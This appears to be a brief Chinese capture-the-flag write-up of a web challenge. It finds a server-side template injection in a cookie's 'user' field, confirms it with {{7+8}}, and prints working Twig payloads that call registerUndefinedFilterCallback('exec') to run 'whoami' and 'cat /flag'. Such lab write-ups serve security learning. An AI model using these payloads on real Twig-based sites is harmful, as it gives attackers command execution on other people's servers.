进入页面看见 flag和hint
点击flag就看到了输入框,tell me 你是谁
点击hint 查看源码
根据提示,cookie处可能存在问题
在输入框随便输入个名字,然后抓包看看cookie
看到cookie里user参数,可疑点SSTI注入,放包然后看浏览器页面;
点击注销,然后直接输入 测试代码
{{7+8}} 不抓包直接提交
哦了,构造payload吧
user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}} 就是在登录的情况下刷新页面抓包,再把user的内容改了
拿flag
user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}